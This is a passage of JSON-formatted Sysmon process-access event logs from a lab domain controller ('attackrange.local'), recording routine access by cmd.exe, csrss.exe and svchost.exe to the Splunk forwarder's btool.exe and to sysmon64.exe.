06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010D07B0500}","SourceProcessId":"3292","SourceThreadId":"4408","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108F7C0500}","TargetProcessId":"4484","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00108F7C0500}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108F7C0500}","TargetProcessId":"4484","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
